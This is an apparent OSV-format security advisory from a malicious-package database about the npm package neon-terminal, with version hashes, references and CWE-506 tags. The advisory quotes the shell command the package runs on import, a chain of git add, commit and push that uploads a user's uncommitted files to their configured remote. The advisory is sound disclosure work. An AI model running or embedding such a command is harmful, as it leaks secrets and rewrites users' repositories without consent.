{"id":"MAL-2026-6793","summary":"Malicious code in neon-terminal (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (fe8b090e304f95042a17db9e22edef03d8cdd073a214806e8aa3ebe7b2d138f9)\nneon-terminal advertises itself as an ANSI color helper but its CJS entry (dist/index.cjs) and ESM entry (src/index.js) each execute a shell command at top level, so the code fires on `require('neon-terminal')` or `import 'neon-terminal'`. The command runs `pwd && ls -la && git status && git add. && git commit -m \"sync\" && git push -u origin main` in the consumer's current working directory. When loaded inside a project that is a git repository, this stages every local file (including untracked/uncommitted files that may contain secrets, credentials, or in-progress code), creates a commit under the installer's git identity, and pushes to whatever `origin` remote is configured. The behavior is undocumented, ungated, and unrelated to the package's advertised purpose. Consequences on the installer: (1) unauthorized commits to the installer's repository under the installer's identity; (2) exfiltration of local, previously-uncommitted files to the configured remote (which may be a public or third-party-visible repo); (3) destructive mutation of git history / branch state without consent.\n","modified":"2026-07-06T03:31:40.167605907Z","published":"2026-07-06T03:07:29Z","database_specific":{"malicious-packages-origins":[{"import_time":"2026-07-06T03:12:34.469263609Z","modified_time":"2026-07-06T03:08:14Z","source":"amazon-inspector","id":"IN-MAL-2026-007966","sha256":"7dd6cb5ae779e1f3c5e78cd62c7d4abce2254f01cadc465ae31a66c890d4aedc","versions":["0.3.0"]},{"import_time":"2026-07-06T03:12:34.368395179Z","modified_time":"2026-07-06T03:07:46Z","source":"amazon-inspector","versions":["0.7.0"],"sha256":"a013b6f123489f4d4cde454e5fa9474d414c5d96ca2fb4b591bd3f251d965444","id":"IN-MAL-2026-007963"},{"import_time":"2026-07-06T03:12:34.303936388Z","modified_time":"2026-07-06T03:07:38Z","source":"amazon-inspector","id":"IN-MAL-2026-007962","sha256":"bf36bf768a99a85796b17f9326d27d12fddac725163d9055f64fd40f6e32db16","versions":["0.9.0"]},{"import_time":"2026-07-06T03:12:34.276346885Z","modified_time":"2026-07-06T03:07:29Z","source":"amazon-inspector","versions":["0.4.0"],"sha256":"f2a8571e415ee8e20ec04bcf7fa8d689dc02840d931ff569a1f3ed72aa75e731","id":"IN-MAL-2026-007961"},{"import_time":"2026-07-06T03:12:34.439804244Z","modified_time":"2026-07-06T03:08:05Z","source":"amazon-inspector","id":"IN-MAL-2026-007965","sha256":"f4ef60c657027edd1662f32277b50604b6162461924cebd4ed71e3e73b1e87e5","versions":["0.6.0"]},{"import_time":"2026-07-06T03:12:34.396028078Z","modified_time":"2026-07-06T03:07:56Z","source":"amazon-inspector","id":"IN-MAL-2026-007964","sha256":"fe20cb398df96930eff1a5c4f708fdf9b96c449f29958a6103bb2648a4e5b759","versions":["0.5.0"]},{"import_time":"2026-07-06T03:12:34.497658844Z","modified_time":"2026-07-06T03:08:22Z","source":"amazon-inspector","versions":["0.2.0"],"sha256":"fe8b090e304f95042a17db9e22edef03d8cdd073a214806e8aa3ebe7b2d138f9","id":"IN-MAL-2026-007967"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/neon-terminal/v/0.3.0"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/neon-terminal/v/0.7.0"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/neon-terminal/v/0.9.0"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/neon-terminal/v/0.4.0"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/neon-terminal/v/0.6.0"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/neon-terminal/v/0.5.0"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/neon-terminal/v/0.2.0"}],"affected":[{"package":{"name":"neon-terminal","ecosystem":"npm","purl":"pkg:npm/neon-terminal"},"versions":["0.3.0","0.7.0","0.9.0","0.4.0","0.6.0","0.5.0","0.2.0"],"database_specific":{"indicators":{"evidence_files":[{"tlsh":"554132e79de930110b9284b0e019a043abe959345113f2bcfcfaa6389fcd664c171fb4","sha256":"f9fceeebc3cb72d79983c800770fb730f0a63c3d3e48b489b488f5efdb7e6a0f","path":"cjs/src/index.js"},{"tlsh":"da4114eb9dd921100aa24474e419e003579d19346217f2bcfcfaa2385edc668c172fb8","sha256":"72a4853d83ff776dd3ebd2fb692394a7042aa01d1c3e236fb619db221a92c186","path":"src/index.js"},{"tlsh":"8201de11ccae0e2312c96a24dd5a4642d071882b4854be0e33ea527c4b9c9ef20fe75e","sha256":"cccd6e4654b872c88d1271fd0a0ae213bbf5ff1aedffd8c79672060a78cca37e","path":"package.json"}],"package_integrity":[{"filename":"neon-terminal-0.3.0.tgz","hashes":{"sha512_sri":"sha512-ccm8SwLkfJfFmwSZqGkquK/CIlfoJ74vTrOdjTZNVDHSAfxZjUTuf7aehP1mV7s9rnqrkoY/HktW4PSxntdSVA==","sha1":"6d102bdda39373cbe2200f2acb2764ca42fe4a1c"}}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/neon-terminal/MAL-2026-6793.json","cwes":[{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."},{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."}]}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}